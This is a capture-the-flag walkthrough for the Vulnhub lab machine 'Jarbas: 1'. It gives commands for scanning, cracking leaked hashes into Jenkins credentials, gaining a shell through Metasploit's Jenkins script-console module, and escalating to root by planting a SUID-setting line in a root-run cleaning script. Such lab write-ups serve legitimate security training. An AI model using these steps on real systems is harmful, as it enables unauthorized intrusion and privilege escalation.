Jarbas: 1 Vulnhub Walkthrough

Description

In this article, we will make the solution of Jarbas. A single series machine. We will perform vulnerability detection on a system using CentOS. If you want to download the machine affected by the vulnerability, you can click here. In this article, we will see the solution to the Jarbas: 1 machine. Let’s start.

Writeup

First of all, we learn the IP address of the weak machine as usual.

netdiscover
netdiscover scan jarbas

We obtained the IP address of the vulnerable machine and now we will scan open ports with the Nmap tool.

nmap -sV 192.168.1.3
nmap and port scan jarbas

After seeing the open ports, we examine the port number 80 and we do not come across any hints on the site. When we examine our ports, we see that it is open on port 8080 in addition to 22 and 80. We are looking at port 8080 for this and a Jenkins entrance panel appears.

jenkins login panel jarbas

A login panel welcomes us, now our first step will be to obtain this login panel information. We will perform a scan with the DIRB tool to see all the content in the IP Address.

dirb http://192.168.1.3/ -w /usr/share/wordlists/dirb/big.txt -X .txt,.html
Dir buster and dirb scan jarbas

You can use the wordlist “<wordlistlocation>” in the DIRB code. When you install the DIRB tool, your wordlists come automatically “/usr/share/wordlists/dirb/”. Our DIRB search is complete.

When we visit /access.html from the DIRB scan, it gives us 3 encrypted data. We will get help from a site to find out what this data is.

password encrypted jarbas

We have 3 login information. Now it will be time to try them one by one.

cracked hashes jarbas

When we try all of them in the results, we can only login with the “eder” username. We are successfully logging in to the system with the eder.

eder:vipsu
Jenkins log in jarbas

Exploit

Next up is to find out which gaps we have and how we can exploit them. We need to do research for Metasploit in the name of Jenkins exploit.

msfconsole
search jerkins
Msfconsole and Searchsploit jarbas

We found the exploit we will use as a result of the search. Now it will be right to fill in the information in the options section. Afterward, we will be successfully logged into the system. Then we will start collecting various tips to rise to the root user.

use exploit/multi/http/jenkins_script_console
set target 1
set rhosts 192.168.1.3
set rport 8080
set username eder
set password vipsu
set targeturi /
run
Metasploit and msfconsole jarbas

We saw that a cleaning script was run. This can be a step for us to be the root user. We download the file to our system in order to make changes to the script.

cd /etc/script
download CleaningScript.sh
download cleaning script jarbas

We downloaded the file and we will make changes. In this change, we will change the file contents as in the code line and save.

chmod u+s /usr/bin/find
nano editor jarbas chmod u+s /usr/bin/find

After changing and saving our script file, we upload it to the system again. After completing the installation process on the system, when we do something about each find command, the system will give us the information we want as a root user.

find /home -exec cat /root/flag.txt \;
cat root.txt jarbas

We came to the end of the Jarbas Vulnhub machine solution. Click here for the previous single series Vulnhub machine solution.

Related Posts

Scroll to Top